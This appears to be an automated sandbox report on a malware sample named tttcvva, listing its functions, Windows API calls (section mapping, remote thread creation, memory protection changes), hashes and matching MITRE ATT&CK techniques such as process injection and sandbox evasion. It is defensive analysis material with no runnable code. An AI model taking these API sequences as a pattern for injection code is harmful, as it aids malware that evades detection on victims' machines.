Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 00417090 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 271
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00417160
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00417179
FindAtomW.KERNEL32(00000000), ref: 00417180
GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 00417188
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004171A0
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004171C7
MoveFileA.KERNEL32(004194C8,004194A8), ref: 004171D7
GetVersionExW.KERNEL32(?), ref: 004171E4
DisconnectNamedPipe.KERNEL32(?), ref: 004171F7
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041723C
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041724B
LCMapStringA.KERNEL32(00000000,00000000,004194D8,00000000,?,00000000), ref: 00417261
GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 00417273
OpenFileMappingA.KERNEL32(00000000,00000000,00419508), ref: 00417289
SetCommState.KERNELBASE(00000000,00000000), ref: 004172B4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004172E1
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004172F2
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004172FA
LoadLibraryA.KERNELBASE(00419530), ref: 00417392

Strings

}$, xrefs: 004173E7
k`, xrefs: 004173C3

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: Console$CommFile$ReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectExchangeFindFontInterlockedLengthLibraryLoadMappingModuleMoveNameNamedOpenOutputPathPipeRectSearchSizeStateTypeVersion
String ID: k`$}$
API String ID: 2133105460-956986773
Opcode ID: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
Instruction ID: cef9a39308b5a98140bcba38773e80a9b25639b08e6fbc118f284f3ebe5161b8
Opcode Fuzzy Hash: 7bdc7f59d08a260e90253dcea39e02bff59233ecd9922655c77862ab95c5ebe0
Instruction Fuzzy Hash: 2291E372C45528ABC721AB61EC44ADF7B78EF49351F01806EF50AA7150CB381A86CFED

Function 0477003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0477024D

Strings

cess, xrefs: 0477018D
kernel32.dll, xrefs: 0477008F, 04770095

Memory Dump Source

Source File: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4770000_tttcvva.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: ecd76446a7d31f787432ffb9e76f6f8b75e5e291a2e76d5d063c5755b7debd2f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 72527974A01269DFDB64CF68C984BACBBB1BF09304F5480D9E94DAB351DB30AA85DF14

Function 00417363 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00419530), ref: 00417392
InterlockedDecrement.KERNEL32(?), ref: 004173E0

Strings

}$, xrefs: 004173E7
k`, xrefs: 004173C3

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
Instruction ID: 92a10e5f27b6df14f57ef87c33efa73532c21aaf5ae15a36d787c78b43c6be55
Opcode Fuzzy Hash: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
Instruction Fuzzy Hash: 71213A31D482148BC7219B20E8917EA7B30EB48325F52447FDD8997251CB385CD5CB99

Function 00416D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 00416DDF
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 00416E1C
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 00416E3B

Strings

, xrefs: 00416D45

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
Instruction ID: bfee18a85016a47b5ddbaf570877db746f2843951a7396f5e1c013fbe7522b0d
Opcode Fuzzy Hash: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
Instruction Fuzzy Hash: 4C315E559C93C4CAE301CBB8FC847553B63AB29744F408468D148CB3E2D7BA252AC76E

Function 02C60C10 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C60C38
Module32First.KERNEL32(00000000,00000224), ref: 02C60C58

Memory Dump Source

Source File: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c5d000_tttcvva.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: eee23764bb99da3503f479cceadf43715a99e385023f78fcff78512de612f1fa
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 9BF09635500B147FD7203BF599CCB7E76E9BF89668F100528E642E14C0DB70E9494A62

Function 04770E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,04770223,?,?), ref: 04770E19
SetErrorMode.KERNELBASE(00000000,?,?,04770223,?,?), ref: 04770E1E

Memory Dump Source

Source File: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4770000_tttcvva.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4b6e488307e436a8d64bb741689f94e5310f1786c1f5465f85b6a0ffcecc8059
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A3D0123114512877DB003AA4DC09BCD7B1CDF09B62F408011FB0DD9180C7B0954046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02C608CF Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02C60920

Memory Dump Source

Source File: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c5d000_tttcvva.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 97a39681d0f2f472e30f7221b3bcf22674e07dea2e403afcb0c78270bb4f396d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: F7113F79A00208EFDB01DF98C985E98BBF5AF08351F158094F948AB361D371EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00416CD0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417344), ref: 00416CD8

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 00416ED0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00416F01
WritePrivateProfileStringW.KERNEL32(00419450,004193D0,00419394,00419340), ref: 00416F25
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00416F2D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00416F6D
GetComputerNameW.KERNEL32(?,?), ref: 00416F81
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416F8F
OpenJobObjectA.KERNEL32(00000000,00000000,004194A0), ref: 00416F9E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00416FAF

Strings

-, xrefs: 00416FBC

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
Instruction ID: 8f7d67f1928f44ffaa59fc403b52841f5e51a7ccc1cf3445b47acfe1213c342b
Opcode Fuzzy Hash: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
Instruction Fuzzy Hash: DA21DB31A4434CABD7109FA4DC49BD97B74EB0C711F1241A9F749AA1C0CAB459C9CB5D

Function 00416FF0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417024
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041703F
HeapDestroy.KERNEL32(00000000), ref: 0041705E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041706D

Memory Dump Source

Source File: 00000005.00000002.2053598433.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_tttcvva.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
Instruction ID: 368a894d8ff72c9ccf33279a8f005ab713ac243706c75ee28622bc71169ac13e
Opcode Fuzzy Hash: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
Instruction Fuzzy Hash: CA01D4B5A403089BD720EB64EC45BEA3BB8EB0C742F40002AE709A7281DF746984CF59

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

